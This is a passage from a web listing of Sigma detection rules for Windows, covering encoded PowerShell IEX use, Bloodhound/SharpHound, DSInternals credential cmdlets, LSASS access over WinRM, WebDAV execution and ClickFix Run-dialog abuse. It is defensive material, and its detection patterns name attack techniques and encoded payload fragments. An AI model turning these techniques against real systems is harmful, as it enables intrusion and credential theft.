- 'OAEUAdAAuAHcAZQBCA'
- 'bgBlAFQALgB3AGUAQg'
- '4AZQBUAC4AdwBlAEIA'
- 'uAGUAVAAuAHcAZQBCA'
- 'TgBlAFQALgB3AGUAQg'
- 'OAGUAVAAuAHcAZQBCA'
- 'bgBFAFQALgB3AGUAQg'
- '4ARQBUAC4AdwBlAEIA'
- 'uAEUAVAAuAHcAZQBCA'
- 'TgBFAFQALgB3AGUAQg'
- 'OAEUAVAAuAHcAZQBCA'
- 'bgBlAHQALgBXAGUAQg'
- '4AZQB0AC4AVwBlAEIA'
- 'uAGUAdAAuAFcAZQBCA'
- 'TgBlAHQALgBXAGUAQg'
- 'OAGUAdAAuAFcAZQBCA'
- 'bgBFAHQALgBXAGUAQg'
- '4ARQB0AC4AVwBlAEIA'
- 'uAEUAdAAuAFcAZQBCA'
- 'TgBFAHQALgBXAGUAQg'
- 'OAEUAdAAuAFcAZQBCA'
- 'bgBlAFQALgBXAGUAQg'
- '4AZQBUAC4AVwBlAEIA'
- 'uAGUAVAAuAFcAZQBCA'
- 'TgBlAFQALgBXAGUAQg'
- 'OAGUAVAAuAFcAZQBCA'
- 'bgBFAFQALgBXAGUAQg'
- '4ARQBUAC4AVwBlAEIA'
- 'uAEUAVAAuAFcAZQBCA'
- 'TgBFAFQALgBXAGUAQg'
- 'OAEUAVAAuAFcAZQBCA'
- 'bgBlAHQALgB3AEUAQg'
- '4AZQB0AC4AdwBFAEIA'
- 'uAGUAdAAuAHcARQBCA'
- 'TgBlAHQALgB3AEUAQg'
- 'OAGUAdAAuAHcARQBCA'
- 'bgBFAHQALgB3AEUAQg'
- '4ARQB0AC4AdwBFAEIA'
- 'uAEUAdAAuAHcARQBCA'
- 'TgBFAHQALgB3AEUAQg'
- 'OAEUAdAAuAHcARQBCA'
- 'bgBlAFQALgB3AEUAQg'
- 'uAGUAVAAuAHcARQBCA'
- 'bgBFAFQALgB3AEUAQg'
- '4ARQBUAC4AdwBFAEIA'
- 'uAEUAVAAuAHcARQBCA'
- 'TgBFAFQALgB3AEUAQg'
- 'OAEUAVAAuAHcARQBCA'
- 'TgBlAHQALgBXAEUAQg'
- '4AZQB0AC4AVwBFAEIA'
- 'OAGUAdAAuAFcARQBCA'
- 'bgBFAHQALgBXAEUAQg'
- '4ARQB0AC4AVwBFAEIA'
- 'uAEUAdAAuAFcARQBCA'
- 'TgBFAHQALgBXAEUAQg'
- 'OAEUAdAAuAFcARQBCA'
- 'bgBlAFQALgBXAEUAQg'
- '4AZQBUAC4AVwBFAEIA'
- 'uAGUAVAAuAFcARQBCA'
- 'TgBlAFQALgBXAEUAQg'
- 'OAGUAVAAuAFcARQBCA'
- 'bgBFAFQALgBXAEUAQg'
- '4ARQBUAC4AVwBFAEIA'
- 'uAEUAVAAuAFcARQBCA'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Suspicious PowerShell IEX Execution Patterns
Detects suspicious ways to run Invoke-Execution using IEX alias
status test
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
id 09576804-7a05-458e-a817-eb718ca91f54
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious PowerShell IEX Execution Patterns
id: 09576804-7a05-458e-a817-eb718ca91f54
status: test
description: Detects suspicious ways to run Invoke-Execution using IEX alias
references:
- https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2
- https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
date: 2022-03-24
modified: 2022-11-28
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection_combined_1:
Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
CommandLine|contains:
- ' | iex;'
- ' | iex '
- ' | iex}'
- ' | IEX ;'
- ' | IEX -Error'
- ' | IEX (new'
- ');IEX '
selection_combined_2:
CommandLine|contains:
- '::FromBase64String'
- '.GetString([System.Convert]::'
selection_standalone:
CommandLine|contains:
- ')|iex;$'
- ');iex($'
- ');iex $'
- ' | IEX | '
- ' | iex\"'
condition: all of selection_combined_* or selection_standalone
falsepositives:
- Legitimate scripts that use IEX
level: high
related
high
HackTool - Bloodhound/Sharphound Execution
Detects command line parameters used by Bloodhound and Sharphound hack tools
status test
author Florian Roth (Nextron Systems)
id f376c8a7-a2d0-4ddc-aa0c-16c17236d962
license Sigma · DRL-1.1
view Sigma YAML
title: HackTool - Bloodhound/Sharphound Execution
id: f376c8a7-a2d0-4ddc-aa0c-16c17236d962
status: test
description: Detects command line parameters used by Bloodhound and Sharphound hack tools
references:
- https://github.com/BloodHoundAD/BloodHound
- https://github.com/BloodHoundAD/SharpHound
author: Florian Roth (Nextron Systems)
date: 2019-12-20
modified: 2023-02-04
tags:
- attack.discovery
- attack.t1087.001
- attack.t1087.002
- attack.t1482
- attack.t1069.001
- attack.t1069.002
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Product|contains: 'SharpHound'
- Description|contains: 'SharpHound'
- Company|contains:
- 'SpecterOps'
- 'evil corp'
- Image|contains:
- '\Bloodhound.exe'
- '\SharpHound.exe'
selection_cli_1:
CommandLine|contains:
- ' -CollectionMethod All '
- ' --CollectionMethods Session '
- ' --Loop --Loopduration '
- ' --PortScanTimeout '
- '.exe -c All -d '
- 'Invoke-Bloodhound'
- 'Get-BloodHoundData'
selection_cli_2:
CommandLine|contains|all:
- ' -JsonFolder '
- ' -ZipFileName '
selection_cli_3:
CommandLine|contains|all:
- ' DCOnly '
- ' --NoSaveCache '
condition: 1 of selection_*
falsepositives:
- Other programs that use these command line option and accepts an 'All' parameter
level: high
related
high
Cmd.EXE Missing Space Characters Execution Anomaly
Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
This could be a sign of obfuscation of a fat finger problem (typo by the developer).
status test
author Florian Roth (Nextron Systems)
id a16980c2-0c56-4de0-9a79-17971979efdd
license Sigma · DRL-1.1
view Sigma YAML
title: Cmd.EXE Missing Space Characters Execution Anomaly
id: a16980c2-0c56-4de0-9a79-17971979efdd
status: test
description: |
Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe.
This could be a sign of obfuscation of a fat finger problem (typo by the developer).
references:
- https://twitter.com/cyb3rops/status/1562072617552678912
- https://ss64.com/nt/cmd.html
author: Florian Roth (Nextron Systems)
date: 2022-08-23
modified: 2023-03-06
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection1: # missing space before the /c
CommandLine|contains:
- 'cmd.exe/c'
- '\cmd/c' # just cmd/c would be prone to false positives
- '"cmd/c'
- 'cmd.exe/k'
- '\cmd/k' # just cmd/k would be prone to false positives
- '"cmd/k'
- 'cmd.exe/r'
- '\cmd/r' # just cmd/r would be prone to false positives
- '"cmd/r'
selection2: # special cases verified via Virustotal Enterprise search
CommandLine|contains:
- '/cwhoami'
- '/cpowershell'
- '/cschtasks'
- '/cbitsadmin'
- '/ccertutil'
- '/kwhoami'
- '/kpowershell'
- '/kschtasks'
- '/kbitsadmin'
- '/kcertutil'
selection3: # missing space after the /c
CommandLine|contains:
- 'cmd.exe /c'
- 'cmd /c'
- 'cmd.exe /k'
- 'cmd /k'
- 'cmd.exe /r'
- 'cmd /r'
filter_generic:
CommandLine|contains:
- 'cmd.exe /c '
- 'cmd /c '
- 'cmd.exe /k '
- 'cmd /k '
- 'cmd.exe /r '
- 'cmd /r '
filter_fp:
- CommandLine|contains: 'AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules'
- CommandLine|endswith: 'cmd.exe/c .'
- CommandLine: 'cmd.exe /c'
condition: 1 of selection* and not 1 of filter_*
falsepositives:
- Unknown
level: high
related
high
Malicious Base64 Encoded PowerShell Keywords in Command Lines
Detects base64 encoded strings used in hidden malicious PowerShell command lines
status test
author John Lambert (rule)
id f26c6093-6f14-4b12-800f-0fcb46f5ffd0
license Sigma · DRL-1.1
view Sigma YAML
title: Malicious Base64 Encoded PowerShell Keywords in Command Lines
id: f26c6093-6f14-4b12-800f-0fcb46f5ffd0
status: test
description: Detects base64 encoded strings used in hidden malicious PowerShell command lines
references:
- http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
author: John Lambert (rule)
date: 2019-01-16
modified: 2023-01-05
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_hidden:
CommandLine|contains: ' hidden '
selection_encoded:
CommandLine|contains:
- 'AGkAdABzAGEAZABtAGkAbgAgAC8AdAByAGEAbgBzAGYAZQByA'
- 'aXRzYWRtaW4gL3RyYW5zZmVy'
- 'IAaQB0AHMAYQBkAG0AaQBuACAALwB0AHIAYQBuAHMAZgBlAHIA'
- 'JpdHNhZG1pbiAvdHJhbnNmZX'
- 'YgBpAHQAcwBhAGQAbQBpAG4AIAAvAHQAcgBhAG4AcwBmAGUAcg'
- 'Yml0c2FkbWluIC90cmFuc2Zlc'
- 'AGMAaAB1AG4AawBfAHMAaQB6AGUA'
- 'JABjAGgAdQBuAGsAXwBzAGkAegBlA'
- 'JGNodW5rX3Npem'
- 'QAYwBoAHUAbgBrAF8AcwBpAHoAZQ'
- 'RjaHVua19zaXpl'
- 'Y2h1bmtfc2l6Z'
- 'AE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4A'
- 'kATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8Abg'
- 'lPLkNvbXByZXNzaW9u'
- 'SQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuA'
- 'SU8uQ29tcHJlc3Npb2'
- 'Ty5Db21wcmVzc2lvb'
- 'AE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQ'
- 'kATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtA'
- 'lPLk1lbW9yeVN0cmVhb'
- 'SQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0A'
- 'SU8uTWVtb3J5U3RyZWFt'
- 'Ty5NZW1vcnlTdHJlYW'
- '4ARwBlAHQAQwBoAHUAbgBrA'
- '5HZXRDaHVua'
- 'AEcAZQB0AEMAaAB1AG4Aaw'
- 'LgBHAGUAdABDAGgAdQBuAGsA'
- 'LkdldENodW5r'
- 'R2V0Q2h1bm'
- 'AEgAUgBFAEEARABfAEkATgBGAE8ANgA0A'
- 'QASABSAEUAQQBEAF8ASQBOAEYATwA2ADQA'
- 'RIUkVBRF9JTkZPNj'
- 'SFJFQURfSU5GTzY0'
- 'VABIAFIARQBBAEQAXwBJAE4ARgBPADYANA'
- 'VEhSRUFEX0lORk82N'
- 'AHIAZQBhAHQAZQBSAGUAbQBvAHQAZQBUAGgAcgBlAGEAZA'
- 'cmVhdGVSZW1vdGVUaHJlYW'
- 'MAcgBlAGEAdABlAFIAZQBtAG8AdABlAFQAaAByAGUAYQBkA'
- 'NyZWF0ZVJlbW90ZVRocmVhZ'
- 'Q3JlYXRlUmVtb3RlVGhyZWFk'
- 'QwByAGUAYQB0AGUAUgBlAG0AbwB0AGUAVABoAHIAZQBhAGQA'
- '0AZQBtAG0AbwB2AGUA'
- '1lbW1vdm'
- 'AGUAbQBtAG8AdgBlA'
- 'bQBlAG0AbQBvAHYAZQ'
- 'bWVtbW92Z'
- 'ZW1tb3Zl'
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Suspicious PowerShell Parent Process
Detects a suspicious or uncommon parent processes of PowerShell
status test
author Teymur Kheirkhabarov, Harish Segar
id 754ed792-634f-40ae-b3bc-e0448d33f695
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious PowerShell Parent Process
id: 754ed792-634f-40ae-b3bc-e0448d33f695
related:
- id: 692f0bec-83ba-4d04-af7e-e884a96059b6
type: derived
status: test
description: Detects a suspicious or uncommon parent processes of PowerShell
references:
- https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26
author: Teymur Kheirkhabarov, Harish Segar
date: 2020-03-20
modified: 2023-02-04
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_parent:
- ParentImage|contains: 'tomcat'
- ParentImage|endswith:
- '\amigo.exe'
- '\browser.exe'
- '\chrome.exe'
- '\firefox.exe'
- '\httpd.exe'
- '\iexplore.exe'
- '\jbosssvc.exe'
- '\microsoftedge.exe'
- '\microsoftedgecp.exe'
- '\MicrosoftEdgeSH.exe'
- '\mshta.exe'
- '\nginx.exe'
- '\outlook.exe'
- '\php-cgi.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\safari.exe'
- '\services.exe'
- '\sqlagent.exe'
- '\sqlserver.exe'
- '\sqlservr.exe'
- '\vivaldi.exe'
- '\w3wp.exe'
selection_powershell:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- CommandLine|contains:
- '/c powershell' # FPs with sub processes that contained "powershell" somewhere in the command line
- '/c pwsh'
- Description: 'Windows PowerShell'
- Product: 'PowerShell Core 6'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
condition: all of selection_*
falsepositives:
- Other scripts
level: high
related
high
PowerShell Base64 Encoded IEX Cmdlet
Detects usage of a base64 encoded "IEX" cmdlet in a process command line
status test
author Florian Roth (Nextron Systems)
id 88f680b8-070e-402c-ae11-d2914f2257f1
license Sigma · DRL-1.1
view Sigma YAML
title: PowerShell Base64 Encoded IEX Cmdlet
id: 88f680b8-070e-402c-ae11-d2914f2257f1
status: test
description: Detects usage of a base64 encoded "IEX" cmdlet in a process command line
references:
- Internal Research
author: Florian Roth (Nextron Systems)
date: 2019-08-23
modified: 2023-04-06
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection:
- CommandLine|base64offset|contains:
- 'IEX (['
- 'iex (['
- 'iex (New'
- 'IEX (New'
- 'IEX(['
- 'iex(['
- 'iex(New'
- 'IEX(New'
- "IEX(('"
- "iex(('"
# UTF16 LE
- CommandLine|contains:
- 'SQBFAFgAIAAoAFsA'
- 'kARQBYACAAKABbA'
- 'JAEUAWAAgACgAWw'
- 'aQBlAHgAIAAoAFsA'
- 'kAZQB4ACAAKABbA'
- 'pAGUAeAAgACgAWw'
- 'aQBlAHgAIAAoAE4AZQB3A'
- 'kAZQB4ACAAKABOAGUAdw'
- 'pAGUAeAAgACgATgBlAHcA'
- 'SQBFAFgAIAAoAE4AZQB3A'
- 'kARQBYACAAKABOAGUAdw'
- 'JAEUAWAAgACgATgBlAHcA'
condition: selection
falsepositives:
- Unknown
level: high
related
high
DSInternals Suspicious PowerShell Cmdlets
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
status test
author Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri
id 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e
license Sigma · DRL-1.1
view Sigma YAML
title: DSInternals Suspicious PowerShell Cmdlets
id: 43d91656-a9b2-4541-b7e2-6a9bd3a13f4e
related:
- id: 846c7a87-8e14-4569-9d49-ecfd4276a01c
type: similar
status: test
description: |
Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files.
The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation.
references:
- https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
author: Nasreddine Bencherchali (Nextron Systems), Nounou Mbeiri
date: 2024-06-26
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: process_creation
detection:
selection:
CommandLine|contains:
- 'Add-ADDBSidHistory'
- 'Add-ADNgcKey'
- 'Add-ADReplNgcKey'
- 'ConvertFrom-ADManagedPasswordBlob'
- 'ConvertFrom-GPPrefPassword'
- 'ConvertFrom-ManagedPasswordBlob'
- 'ConvertFrom-UnattendXmlPassword'
- 'ConvertFrom-UnicodePassword'
- 'ConvertTo-AADHash'
- 'ConvertTo-GPPrefPassword'
- 'ConvertTo-KerberosKey'
- 'ConvertTo-LMHash'
- 'ConvertTo-MsoPasswordHash'
- 'ConvertTo-NTHash'
- 'ConvertTo-OrgIdHash'
- 'ConvertTo-UnicodePassword'
- 'Disable-ADDBAccount'
- 'Enable-ADDBAccount'
- 'Get-ADDBAccount'
- 'Get-ADDBBackupKey'
- 'Get-ADDBDomainController'
- 'Get-ADDBGroupManagedServiceAccount'
- 'Get-ADDBKdsRootKey'
- 'Get-ADDBSchemaAttribute'
- 'Get-ADDBServiceAccount'
- 'Get-ADDefaultPasswordPolicy'
- 'Get-ADKeyCredential' # Covers 'Get-ADKeyCredentialLink'
- 'Get-ADPasswordPolicy'
- 'Get-ADReplAccount'
- 'Get-ADReplBackupKey'
- 'Get-ADReplicationAccount'
- 'Get-ADSIAccount'
- 'Get-AzureADUserEx'
- 'Get-BootKey'
- 'Get-KeyCredential'
- 'Get-LsaBackupKey'
- 'Get-LsaPolicy' # Covers 'Get-LsaPolicyInformation'
- 'Get-SamPasswordPolicy'
- 'Get-SysKey'
- 'Get-SystemKey'
- 'New-ADDBRestoreFromMediaScript'
- 'New-ADKeyCredential' # Covers 'New-ADKeyCredentialLink'
- 'New-ADNgcKey'
- 'New-NTHashSet'
- 'Remove-ADDBObject'
- 'Save-DPAPIBlob'
- 'Set-ADAccountPasswordHash'
- 'Set-ADDBAccountPassword' # Covers 'Set-ADDBAccountPasswordHash'
- 'Set-ADDBBootKey'
- 'Set-ADDBDomainController'
- 'Set-ADDBPrimaryGroup'
- 'Set-ADDBSysKey'
- 'Set-AzureADUserEx'
- 'Set-LsaPolicy' # Covers 'Set-LSAPolicyInformation'
- 'Set-SamAccountPasswordHash'
- 'Set-WinUserPasswordHash'
- 'Test-ADDBPasswordQuality'
- 'Test-ADPasswordQuality'
- 'Test-ADReplPasswordQuality'
- 'Test-PasswordQuality'
- 'Unlock-ADDBAccount'
- 'Write-ADNgcKey'
- 'Write-ADReplNgcKey'
condition: selection
falsepositives:
- Legitimate usage of DSInternals for administration or audit purpose.
level: high
related
high
HTML Help HH.EXE Suspicious Child Process
Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
status test
author Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
id 52cad028-0ff0-4854-8f67-d25dfcbc78b4
license Sigma · DRL-1.1
view Sigma YAML
title: HTML Help HH.EXE Suspicious Child Process
id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
status: test
description: Detects a suspicious child process of a Microsoft HTML Help (HH.exe)
references:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
- https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/
- https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37
author: Maxim Pavlunin, Nasreddine Bencherchali (Nextron Systems)
date: 2020-04-01
modified: 2023-04-12
tags:
- attack.execution
- attack.initial-access
- attack.stealth
- attack.t1047
- attack.t1059.001
- attack.t1059.003
- attack.t1059.005
- attack.t1059.007
- attack.t1218
- attack.t1218.001
- attack.t1218.010
- attack.t1218.011
- attack.t1566
- attack.t1566.001
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: '\hh.exe'
Image|endswith:
- '\CertReq.exe'
- '\CertUtil.exe'
- '\cmd.exe'
- '\cscript.exe'
- '\installutil.exe'
- '\MSbuild.exe'
- '\MSHTA.EXE'
- '\msiexec.exe'
- '\powershell.exe'
- '\pwsh.exe'
- '\regsvr32.exe'
- '\rundll32.exe'
- '\schtasks.exe'
- '\wmic.exe'
- '\wscript.exe'
condition: selection
falsepositives:
- Unknown
level: high
related
high
Windows Shell/Scripting Processes Spawning Suspicious Programs
Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
status test
author Florian Roth (Nextron Systems), Tim Shelton
id 3a6586ad-127a-4d3b-a677-1e6eacdf8fde
license Sigma · DRL-1.1
view Sigma YAML
title: Windows Shell/Scripting Processes Spawning Suspicious Programs
id: 3a6586ad-127a-4d3b-a677-1e6eacdf8fde
status: test
description: Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.
references:
- https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
author: Florian Roth (Nextron Systems), Tim Shelton
date: 2018-04-06
modified: 2023-05-23
tags:
- attack.execution
- attack.stealth
- attack.t1059.005
- attack.t1059.001
- attack.t1218
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith:
- '\mshta.exe'
- '\powershell.exe'
- '\pwsh.exe'
# - '\cmd.exe' # too many false positives
- '\rundll32.exe'
- '\cscript.exe'
- '\wscript.exe'
- '\wmiprvse.exe'
- '\regsvr32.exe'
Image|endswith:
- '\schtasks.exe'
- '\nslookup.exe'
- '\certutil.exe'
- '\bitsadmin.exe'
- '\mshta.exe'
filter_ccmcache:
CurrentDirectory|contains: '\ccmcache\'
filter_amazon:
ParentCommandLine|contains:
# FP - Amazon Workspaces
- '\Program Files\Amazon\WorkSpacesConfig\Scripts\setup-scheduledtask.ps1'
- '\Program Files\Amazon\WorkSpacesConfig\Scripts\set-selfhealing.ps1'
- '\Program Files\Amazon\WorkSpacesConfig\Scripts\check-workspacehealth.ps1'
- '\nessus_' # Tenable/Nessus VA Scanner
filter_nessus:
CommandLine|contains: '\nessus_' # Tenable/Nessus VA Scanner
filter_sccm_install:
ParentImage|endswith: '\mshta.exe'
Image|endswith: '\mshta.exe'
ParentCommandLine|contains|all:
- 'C:\MEM_Configmgr_'
- '\splash.hta'
- '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
CommandLine|contains|all:
- 'C:\MEM_Configmgr_'
- '\SMSSETUP\BIN\'
- '\autorun.hta'
- '{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}'
condition: selection and not 1 of filter_*
falsepositives:
- Administrative scripts
- Microsoft SCCM
level: high
related
high
Exchange PowerShell Snap-Ins Usage
Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
status test
author FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
id 25676e10-2121-446e-80a4-71ff8506af47
license Sigma · DRL-1.1
view Sigma YAML
title: Exchange PowerShell Snap-Ins Usage
id: 25676e10-2121-446e-80a4-71ff8506af47
status: test
description: Detects adding and using Exchange PowerShell snap-ins to export mailbox data. As seen used by HAFNIUM and APT27
references:
- https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/
- https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
- https://www.intrinsec.com/apt27-analysis/
author: FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
date: 2021-03-03
modified: 2023-03-24
tags:
- attack.execution
- attack.t1059.001
- attack.collection
- attack.t1114
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|endswith:
- '\powershell.exe'
- '\pwsh.exe'
- OriginalFileName:
- 'PowerShell.EXE'
- 'pwsh.dll'
selection_cli:
CommandLine|contains: 'Add-PSSnapin'
selection_module:
CommandLine|contains:
- 'Microsoft.Exchange.Powershell.Snapin'
- 'Microsoft.Exchange.Management.PowerShell.SnapIn'
filter_msiexec:
# ParentCommandLine: C:\Windows\System32\MsiExec.exe -Embedding C9138ECE2536CB4821EB5F55D300D88E E Global\MSI0000
ParentImage: 'C:\Windows\System32\msiexec.exe'
CommandLine|contains: '$exserver=Get-ExchangeServer ([Environment]::MachineName) -ErrorVariable exerr 2> $null'
condition: all of selection_* and not 1 of filter_*
falsepositives:
- Unknown
level: high
related
high
Suspicious File Execution From Internet Hosted WebDav Share
Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
status test
author pH-T (Nextron Systems)
id f0507c0f-a3a2-40f5-acc6-7f543c334993
license Sigma · DRL-1.1
view Sigma YAML
title: Suspicious File Execution From Internet Hosted WebDav Share
id: f0507c0f-a3a2-40f5-acc6-7f543c334993
status: test
description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files
references:
- https://twitter.com/ShadowChasing1/status/1552595370961944576
- https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior
author: pH-T (Nextron Systems)
date: 2022-09-01
modified: 2023-02-21
tags:
- attack.execution
- attack.t1059.001
logsource:
category: process_creation
product: windows
detection:
selection_img:
- Image|contains: '\cmd.exe'
- OriginalFileName: 'Cmd.EXE'
selection_base:
CommandLine|contains|all:
- ' net use http'
- '& start /b '
- '\DavWWWRoot\'
selection_ext:
CommandLine|contains:
- '.exe '
- '.dll '
- '.bat '
- '.vbs '
- '.ps1 '
condition: all of selection_*
falsepositives:
- Unknown
level: high
related
high
Remote LSASS Process Access Through Windows Remote Management
Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
status stable
author Patryk Prauze - ING Tech
id aa35a627-33fb-4d04-a165-d33b4afca3e8
license Sigma · DRL-1.1
view Sigma YAML
title: Remote LSASS Process Access Through Windows Remote Management
id: aa35a627-33fb-4d04-a165-d33b4afca3e8
status: stable
description: Detects remote access to the LSASS process via WinRM. This could be a sign of credential dumping from tools like mimikatz.
references:
- https://pentestlab.blog/2018/05/15/lateral-movement-winrm/
author: Patryk Prauze - ING Tech
date: 2019-05-20
modified: 2023-11-29
tags:
- attack.credential-access
- attack.execution
- attack.t1003.001
- attack.t1059.001
- attack.lateral-movement
- attack.t1021.006
- attack.s0002
logsource:
category: process_access
product: windows
detection:
selection:
TargetImage|endswith: '\lsass.exe'
SourceImage|endswith: ':\Windows\system32\wsmprovhost.exe'
filter_main_access:
GrantedAccess: '0x80000000'
condition: selection and not 1 of filter_main_*
falsepositives:
- Unlikely
level: high
related
high
Remote PowerShell Sessions Network Connections (WinRM)
Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
status test
author Roberto Rodriguez @Cyb3rWard0g
id 13acf386-b8c6-4fe0-9a6e-c4756b974698
license Sigma · DRL-1.1
view Sigma YAML
title: Remote PowerShell Sessions Network Connections (WinRM)
id: 13acf386-b8c6-4fe0-9a6e-c4756b974698
status: test
description: Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986
references:
- https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html
author: Roberto Rodriguez @Cyb3rWard0g
date: 2019-09-12
modified: 2022-10-09
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
service: security
detection:
selection:
EventID: 5156
DestPort:
- 5985
- 5986
LayerRTID: 44
condition: selection
falsepositives:
- Legitimate use of remote PowerShell execution
level: high
related
high
Potentially Suspicious Command Executed Via Run Dialog Box - Registry
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
status test
author Ahmed Farouk, Nasreddine Bencherchali
id a7df0e9e-91a5-459a-a003-4cde67c2ff5d
license Sigma · DRL-1.1
view Sigma YAML
title: Potentially Suspicious Command Executed Via Run Dialog Box - Registry
id: a7df0e9e-91a5-459a-a003-4cde67c2ff5d
related:
- id: f9d091f6-f1c7-4873-a24f-050b4a02b4dd
type: derived
status: test
description: |
Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key.
This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.
references:
- https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf
- https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71
- https://www.forensafe.com/blogs/runmrukey.html
- https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/
author: Ahmed Farouk, Nasreddine Bencherchali
date: 2024-11-01
tags:
- attack.execution
- attack.t1059.001
logsource:
product: windows
category: registry_set
detection:
selection_key:
TargetObject|contains: '\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'
selection_powershell_command:
Details|contains:
- 'powershell'
- 'pwsh'
selection_powershell_susp_keywords:
Details|contains:
- ' -e '
- ' -ec '
- ' -en '
- ' -enc '
- ' -enco'
- 'ftp'
- 'Hidden'
- 'http'
- 'iex'
- 'Invoke-'
selection_wmic_command:
Details|contains: 'wmic'
selection_wmic_susp_keywords:
Details|contains:
- 'shadowcopy'
- 'process call create'
condition: selection_key and (all of selection_powershell_* or all of selection_wmic_*)
falsepositives:
- Unknown
level: high
related
high
Network Connection Initiated via Finger.EXE
Detects network connections via finger.exe, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.
In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.
